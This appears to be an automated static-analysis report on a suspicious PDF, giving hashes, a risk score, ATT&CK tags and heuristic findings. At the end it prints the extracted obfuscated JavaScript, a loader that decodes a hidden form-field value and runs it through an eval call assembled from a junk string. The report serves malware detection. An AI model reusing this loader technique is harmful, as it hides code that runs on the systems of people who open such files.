PDF static analysis report

Static analysis result for SHA-256 f20829ce7912c8bd…

SUSPICIOUS

PDF

20.1 KB Created: 2012-11-08 19:09:18 +03:00 Authoring application: Adobe Acrobat 7.0 (via Adobe Acrobat 7.0 Image Conversion Plug-in) First seen: 2026-05-07
MD5: 001fb4f28610d8aa95aed65bee006be7 SHA-1: 7369e5505fe50f174cc1f10c797348624e286ad2 SHA-256: f20829ce7912c8bd38bc1614352a04049872c7cfd48f8608d9fd5b8d7fad6c6d
48 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

The PDF file was flagged as malicious by an ML classifier with high confidence. Heuristics indicate the presence of embedded JavaScript, which is often used to exploit vulnerabilities or download secondary payloads. No specific family could be identified, but the presence of JavaScript suggests a delivery mechanism for further malicious activity.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9977

Heuristics 3

  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0106_000.js pdf-javascript-stream PDF /JS object 106 at offset 0x4CEB 1292 bytes
SHA-256: 9c224de20cfb4d64ac142e0732375db93a9c2405cfa8161eed1601ac21996c0f
Preview script
First 1,000 lines of the extracted script
var hjgklsfoire34o = "fghijk";
var reg34e34rfrew = ':ABCD'+'EFG';
var ewr32r23wre = 'QRS'+'TU'+'VWXYZ{'+'}';
var rere3ew2r23w = "()[]^"+"abc"+"de";
var ewrwr23wrewf = 'pqrstuvw';
var ert4t3ret = '45678';
var werr3r2wr3er = '"=<>&\\';
function xbdg54eg(rg34ge){
var gargeggr="";
var r3gferg = 36;
for (var i = 0;i<rg34ge.length-(15-14);i++)
{var cxnerg4feeswf = rg34ge[i];
var reg4ewtfews=xczr4etw4e.indexOf(cxnerg4feeswf)-r3gferg;
var rwghoeregregr= reg4ewtfews+xczr4etw4e.length;
if (reg4ewtfews<(10-10)){reg4ewtfews=rwghoeregregr}
gargeggr += xczr4etw4e.charAt(reg4ewtfews)}
return gargeggr;}
var dsfvcwt4es = '9/!%+-*.,;';
var esdrzw4ry = hjgklsfoire34o+"lmno"+ewrwr23wrewf+'x'+'yz_0123'+ert4t3ret+dsfvcwt4es+werr3r2wr3er;
var nmxcbver4t = ewr32r23wre+' '+rere3ew2r23w+esdrzw4ry;
var xcvzwt4ert4t = reg34e34rfrew +'HIJKLMNOP';
var edrrrt4fw4re = xcvzwt4ert4t+nmxcbver4t;
var xczr4etw4e =edrrrt4fw4re;
var erg4wtgeg=getField("WSWSWS");
var ewfwr34fw4e=erg4wtgeg.value;
var xcvbretyg43e = xbdg54eg(ewfwr34fw4e);
var xbv4tter4t = "hauaiyh9iryh98wyf98awyf89sdayfp89aewyf89wey9wev"+"alrgwrgqr3ewgergvaebgegaehergg";
var dfhja78r278fdsa78tffdfssdf78dasf678as87dasf78d6fs78dfas7d7dt78 = xbv4tter4t.substr(45,4);
app[dfhja78r278fdsa78tffdfssdf78dasf678as87dasf78d6fs78dfas7d7dt78](xcvbretyg43e);